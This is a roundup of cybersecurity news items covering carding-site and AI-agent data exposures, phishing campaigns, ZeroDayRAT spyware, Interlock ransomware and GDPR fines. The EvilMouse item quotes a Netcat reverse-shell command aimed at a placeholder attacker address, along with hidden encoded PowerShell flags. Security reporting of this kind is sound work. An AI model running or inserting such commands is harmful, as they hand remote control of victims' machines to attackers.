AI Coding Error Exposes Massive Stolen Credit Card Database On 16 April, cybersecurity researchers uncovered a misconfigured server linked to Jerry’s Store, a dark web carding marketplace where hackers verify stolen credit cards. The leak stemmed from an AI-assisted coding mistake, revealing the group’s entire database including 345,000 credit cards, of which 145,000 were active. The hackers used Cursor, an AI-powered code editor, to build a statistics dashboard. However, the AI generated an unauthenticated open web directory instead of a secure page, exposing the server to public access. Researchers found that Cursor’s lack of safety guardrails allowed the tool to assist in criminal activity without intervention, despite recognizing its use for credit card fraud. The group tested stolen cards by making small transactions on major platforms, including Amazon (US & JP), Grubhub, Sam’s Club, Temu, Lyft, Elf Cosmetics, and CountryMax. Successful payments confirmed a card’s validity, increasing its dark web value $7 to $18 per card, with the full dataset potentially worth $2.6 million. The exposed data included card numbers, security codes, cardholder names, and home addresses. Jerry’s Store, launched in late 2023, appears to be operated by a Chinese-speaking individual, though the server was hosted in Germany, likely via a bulletproof hosting provider to evade detection. While the incident highlights risks in AI-assisted development, researchers noted that the leak also disrupted criminal operations by exposing their methods. Cursor has not yet responded to the findings.

Amazon Phishing Scam Targets Customers with Fake Product Recall Emails Cybercriminals are exploiting Amazon’s vast customer base reportedly 310 million active users by impersonating the retail giant in a wave of phishing attacks. The latest campaign uses a "product recall" lure, sending emails claiming a purchased item has a safety defect requiring immediate attention. The fraudulent messages, spotted by The Mirror, read: “Dear Customer, we are writing to inform you of a product recall affecting an item from your March 2026 order due to a design defect that may pose a potential safety risk.” The emails are deliberately vague, increasing the likelihood that recipients will assume the notice applies to them. Links in the message redirect victims to fake Amazon login pages designed to steal credentials. This tactic mirrors previous "spray and pray" phishing schemes, where scammers cast a wide net with generic but plausible messages. The holiday season saw a surge in Amazon account takeovers (ATOs), and this latest variation shows no signs of slowing. Amazon customers who receive such emails are advised to avoid clicking links and instead verify messages through the official app or website. Legitimate communications from Amazon appear in the account’s Message Center. Those who fall victim should immediately change their passwords, enable two-factor authentication, and monitor financial accounts for unauthorized activity. The scam has been reported in the UK, with similar tactics likely targeting users globally. Authorities recommend reporting phishing attempts to Amazon and forwarding suspicious texts or emails to designated spam-reporting channels.

EvilMouse: A $44 USB Mouse That Silently Hijacks Systems Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures. Unlike suspicious USB drives, EvilMouse retains normal mouse functionality optical tracking and buttons while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds. The device executes DuckyScript-like sequences, including: - Hidden PowerShell commands (`-WindowStyle Hidden -enc`) - Base64-encoded payloads for obfuscation - Reverse shells via Netcat (`nc -e cmd.exe attacker_ip 4444`) - Persistence mechanisms (e.g., scheduled tasks) In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma. Security Implications EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments. Potential Defenses - USB device whitelisting (Group Policy) - Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring) - Physical port controls (Kensington locks) The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses. EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.

Microsoft Warns of Tax-Season Phishing Surge Targeting U.S. Organizations Microsoft has identified a wave of phishing campaigns exploiting the U.S. tax season to steal credentials and deploy malware. Threat actors are leveraging urgent, time-sensitive lures such as fake refund notices, payroll forms, and IRS impersonations to trick recipients into interacting with malicious links, QR codes, or attachments. The attacks disproportionately target accountants, tax professionals, and industries handling sensitive financial data, including manufacturing, retail, healthcare, and higher education. Some campaigns use Phishing-as-a-Service (PhaaS) platforms like Energy365 and SneakyLog (Kratos) to harvest credentials, including two-factor authentication (2FA) codes, via spoofed Microsoft 365 login pages. Others deploy remote monitoring and management (RMM) tools such as ConnectWise ScreenConnect, Datto, and SimpleHelp to gain persistent access to compromised systems. Key campaigns include: - CPA-themed phishing using the Energy365 kit, sending hundreds of thousands of malicious emails daily. - QR code and W-2 lures targeting ~100 U.S. organizations in manufacturing, retail, and healthcare, redirecting victims to fake Microsoft 365 sign-in pages. - IRS impersonation with cryptocurrency tax form scams, distributing ScreenConnect or SimpleHelp via domains like irs-doc[.]com. - Datto malware delivery via fake tax-filing assistance links sent to accountants. - A large-scale February 10, 2026, attack affecting 29,000 users across 10,000 organizations, primarily in financial services, tech, and retail. Emails, sent via Amazon SES, claimed irregular tax returns under recipients’ Electronic Filing Identification Numbers (EFINs) and directed users to a fake SmartVault site (smartvault[.]im) to download a malicious ScreenConnect installer. The campaigns highlight a 277% year-over-year surge in RMM tool abuse, with attackers daisy-chaining multiple tools to evade detection. Since RMM software is often trusted in corporate environments, unauthorized usage can go unnoticed, complicating attribution and response efforts.

Amazon’s Email Blunder Highlights Risks of Employment Data Leaks A recent misstep by Amazon underscored the severe consequences of accidental employment data leaks, demonstrating how a simple communications error can escalate into a full-blown crisis. The incident involved the premature or unintended disclosure of internal employee information likely through a leaked calendar invite or automated email triggering legal, reputational, and employee relations fallout. Such breaches are particularly damaging in sectors like legal and corporate environments, where sensitive data handling is critical. The fallout from Amazon’s blunder serves as a cautionary example for organizations, emphasizing the need for robust crisis management protocols when handling confidential employee or client information. The event also highlights broader cybersecurity risks facing industries reliant on digital communication, including the legal sector. As regulatory frameworks like GDPR (EU/UK) impose strict data protection requirements, organizations must prioritize compliance to mitigate risks of breaches, fines, and reputational harm. The UK’s Information Commissioner’s Office (ICO) remains a key authority overseeing such incidents, reinforcing the importance of proactive regulatory intelligence. While the specifics of Amazon’s case remain under scrutiny, the incident reinforces the growing threat of human error in cybersecurity where a single oversight can have cascading effects. For businesses, the lesson is clear: even minor lapses in communication security can lead to significant legal and operational consequences.

ZeroDayRAT: A Rising Mobile Spyware Threat with Global Reach Since February 2, 2026, ZeroDayRAT, a sophisticated mobile spyware platform, has been sold openly on Telegram channels, offering cybercriminals an accessible tool for large-scale surveillance and financial theft. Developed and marketed through dedicated groups for sales, support, and updates, the malware targets Android (versions 5–16) and iOS (up to version 26, including iPhone 17 Pro) with minimal technical expertise required. Operators gain real-time control via a browser-based dashboard, enabling live spying, data theft, and financial attacks against victims worldwide. Infections typically begin through social engineering tactics, including smishing texts, phishing emails, fake app stores, or malicious links shared on WhatsApp and Telegram. Once installed via an APK on Android or a payload on iOS ZeroDayRAT grants full device access without the victim’s knowledge. ### Surveillance & Data Exfiltration Capabilities The spyware’s dashboard provides a comprehensive overview of compromised devices, including: - Device details: Model, OS version, battery level, country, lock status, SIM/carrier info, and dual-SIM numbers. - User profiling: App usage timelines, peak activity hours, and network providers. - Real-time notifications: Intercepted alerts from WhatsApp, Instagram, Telegram, YouTube, and system events. - Location tracking: GPS data mapped on Google Maps, with historical movement records (e.g., a device in Bengaluru). - Account harvesting: Usernames/emails from Google, WhatsApp, Instagram, Facebook, Amazon, Flipkart, PhonePe, Paytm, and Spotify enabling account takeovers or follow-up phishing. - SMS access: Full inbox search, message spoofing, and OTP interception, bypassing SMS-based two-factor authentication (2FA). ### Advanced Surveillance & Financial Theft ZeroDayRAT escalates beyond passive monitoring with active spying tools: - Live camera/microphone streams (front/back) synced with GPS for real-time tracking. - Keylogging: Captures keystrokes, biometrics, gestures, and app launches, paired with a live screen preview to steal passwords and sensitive inputs. - Crypto theft: Targets wallets like MetaMask, Trust Wallet, Binance, and Coinbase, swapping clipboard addresses to hijack transactions. - Banking attacks: Compromises UPI apps (PhonePe, Google Pay), Apple Pay, and PayPal via credential overlays, blending traditional and cryptocurrency theft. ### Global Impact Evidence from the dashboard shows compromised devices in multiple countries, including India and the U.S., underscoring the spyware’s widespread deployment. With its low barrier to entry and commercial availability, ZeroDayRAT represents a growing threat to individual privacy, financial security, and organizational data integrity.

Meta AI Agent Exposes Sensitive Data in Internal Security Breach Meta confirmed an internal security incident in which an AI agent inadvertently exposed a large volume of sensitive company and user data to employees. The breach occurred when an engineer sought guidance on an internal forum, and the AI provided a solution that, when implemented, made the data accessible for two hours. While Meta stated that no user data was mishandled, the incident triggered a major security alert, underscoring the company’s focus on data protection. The event is part of a growing trend of AI-related disruptions in major tech firms. Amazon recently experienced outages linked to its internal AI tools, with employees citing rushed deployments leading to errors and reduced productivity. The underlying technology, known as agentic AI, has advanced rapidly, enabling autonomous tasks like financial management and system operations but also introducing new risks. Recent examples include AI agents making unauthorized trades or deleting user data, fueling debates about artificial general intelligence (AGI) and its economic impact. Experts suggest that companies like Meta and Amazon are in the "experimental phase" of AI deployment, often lacking proper risk assessments. Security specialists note that AI agents lack the contextual awareness of human engineers, relying instead on limited "context windows" that can lead to critical oversights. Unlike humans, who accumulate institutional knowledge over time, AI systems require explicit instructions to avoid unintended consequences making such incidents increasingly likely as adoption accelerates.

Interlock Ransomware Exploited Zero-Day in Cisco Firewall Before Patch Ransomware group Interlock exploited a maximum-severity zero-day vulnerability (CVE-2026-20131) in Cisco Secure Firewall Management Center more than a month before the vendor released a patch. The flaw, allowing unauthenticated remote attackers to execute arbitrary Java code as root, was actively abused starting January 26, while Cisco issued fixes on March 4. Amazon’s CJ Moses, CISO of Amazon Integrated Security, revealed the timeline, stating that the company’s MadPot honeypot network detected exploit traffic tied to Interlock’s infrastructure. A misconfigured server also exposed the group’s attack toolkit, providing defenders with critical intelligence. ### Interlock’s Tactics and Toolkit Interlock, a ransomware crew active since 2025, has targeted hospitals, medical facilities, and government entities, disrupting critical services including chemotherapy sessions and pre-surgery appointments and leaking sensitive data. Victims include Davita (kidney dialysis), Kettering Health, and the city of Saint Paul, Minnesota, where a 43 GB data breach forced a state of emergency. The group’s post-exploitation toolkit includes: - A PowerShell script harvesting system details (OS, hardware, services, software, storage, VM inventory, user files, RDP logs, and browser data). - Custom remote access trojans (RATs) in JavaScript and Java, providing persistent access, command execution, file transfer, and SOCKS5 proxy capabilities. - A Bash script configuring Linux servers as reverse proxies, wiping logs, and ensuring persistence. - Memory-resident backdoors and lightweight network beacons to evade detection. - Legitimate tools like ConnectWise ScreenConnect, Volatility, and Certify to blend malicious activity with authorized remote access. ### Redundant Access and Extortion Tactics Interlock deploys multiple backdoors including dual-language implants (JavaScript and Java) to maintain access even if one is detected. Their ransom notes threaten regulatory exposure, leveraging compliance violations alongside data encryption and leaks to pressure victims. Cisco has updated its security advisory, urging customers to apply patches immediately. The incident underscores the growing sophistication of ransomware groups in exploiting zero-days before public disclosure.

Critical Phishing Campaign Targets LastPass Users in Sophisticated Attack A high-severity phishing campaign targeting LastPass users began on January 19, 2026, with attackers impersonating the company’s support team to steal master passwords. The fraudulent emails falsely claim an urgent need for vault backups within 24 hours, leveraging social engineering to exploit user trust. LastPass has confirmed that it never requests master passwords or demands immediate vault backups via email, emphasizing that legitimate communications avoid unsolicited urgent actions. The campaign was strategically launched over a U.S. holiday weekend, a tactic designed to capitalize on reduced security staffing and slower incident response times commonly exploited by threat actors to evade detection. The phishing infrastructure relies on two key components: an initial redirect hosted on compromised AWS S3 buckets and a spoofed domain mimicking LastPass’s legitimate services. LastPass is actively working with third-party partners to dismantle the malicious infrastructure and urges users to delete any suspicious emails and report them to [email protected] for further analysis. Organizations are advised to bolster email security controls to block messages from identified sender addresses and reinforce phishing awareness, particularly regarding urgent language and credential requests. The incident underscores the persistent risk of credential harvesting campaigns targeting password manager users.

AI Systems Under Siege: Every Organization Targeted in Past Year, Unit 42 Finds A new report from Palo Alto Networks’ Unit 42 reveals a stark reality: every organization surveyed has faced at least one attack on its AI systems in the past year. The findings, derived from a survey of over 2,800 participants across 10 countries—including the U.S., UK, Germany, Japan, and India—highlight a growing and systemic vulnerability in AI security, with cloud infrastructure at the heart of the problem. Conducted between September 29 and October 17, 2025, the research underscores that AI security cannot rely on reactive measures. Instead, organizations must adopt a proactive, scientific approach to safeguarding AI systems, given their complexity and critical applications. The report emphasizes that AI security is inherently tied to cloud infrastructure, where most AI workloads—data storage, model training, and application deployment—reside. Cloud platforms like AWS, Microsoft Azure, and Google Cloud, while enabling AI scalability, also present prime targets for cyberattacks. Exploitable weaknesses in cloud security can lead to unauthorized access, data theft, or operational disruptions. Traditional security measures often fall short in addressing the unique challenges of AI, such as securing data pipelines, managing identities, and protecting cloud-hosted workloads. The State of Cloud Security Report 2025 argues that the only effective defense is a holistic approach to cloud security, treating it as foundational to AI protection. This includes enforcing strong policies, encryption standards, regular audits, and isolating AI workloads from cloud vulnerabilities. As AI integrates deeper into sectors like healthcare, finance, and autonomous systems, the stakes rise—breaches could compromise sensitive data, disrupt services, or even endanger lives. Emerging threats, such as adversarial attacks designed to manipulate AI models, further complicate the landscape. The report calls for collaboration between cloud providers, AI developers, and security teams to build robust frameworks and real-time threat detection tools. The future of AI security hinges on securing the cloud infrastructure that powers it, ensuring resilience against an evolving threat landscape.

Amazon had fired a number of employees after they shared customer email address and phone numbers with a third-party violating of their policies. No other information related to account was shared.

GDPR Enforcement Remains Strong as Breach Notifications Surge in Europe Data breach notifications across Europe rose by 20% over the past year, even as GDPR fines held steady at €1.2 billion ($1.4 billion) in 2025, according to a report by global law firm DLA Piper. The consistent enforcement levels signal sustained regulatory scrutiny, particularly in areas like AI, supply chain security, and international data transfers. Ireland remained the most active enforcer, issuing the largest fine of 2025 €530 million against TikTok for storing European users’ data on Chinese servers between July 2020 and November 2022 without adequate safeguards or transparency. This marked the first major GDPR penalty for data transfers to a non-U.S. country, expanding concerns beyond transatlantic data flows. Ireland also leads in cumulative fines since GDPR’s 2018 inception, with €4 billion in sanctions, followed by France (€1.1 billion) and Luxembourg (€747 million). Luxembourg’s largest fine €746 million against Amazon Europe Core in 2021 was upheld in March 2025 after the company’s appeal was dismissed. The case remains under seal due to local legal restrictions. Meanwhile, U.S. tech firms continued to face the highest penalties, reflecting persistent tensions over surveillance-driven business models. The European Commission proposed GDPR reforms in November 2024 to simplify compliance, including a unified breach reporting platform managed by ENISA and an extended notification deadline from 72 to 96 hours. The changes aim to reduce overlapping obligations under GDPR, the Network and Information Security Directive 2 (NIS2), and the Digital Operational Resilience Act (DORA), though debates over balancing efficiency with privacy rights are ongoing. In the U.K., enforcement under the post-Brexit Data (Use and Access) Act 2025 has drawn criticism. Over 70 civil society groups and experts urged Parliament to investigate the Information Commissioner’s Office (ICO) after it declined to probe the Ministry of Defense’s 2022 Afghan data breach, which exposed 19,000 individuals fleeing the Taliban. The U.K. government later imposed a super injunction to block public reporting. The new DUA Act, effective June 2025, introduces structural reforms to the ICO, including enhanced investigative powers and transparency requirements.

Amazon’s customer service representative was tricked into disclosing Eric Springer, a user’s personal information by an attacker who used social engineering techniques. The attack initiated through the mail ended up in the attacker getting the credit card details along with the address and other details. The incident got all highlighted on the internet and people on the web demanded social engineering training to be given to employees to prevent any such incidents in the future.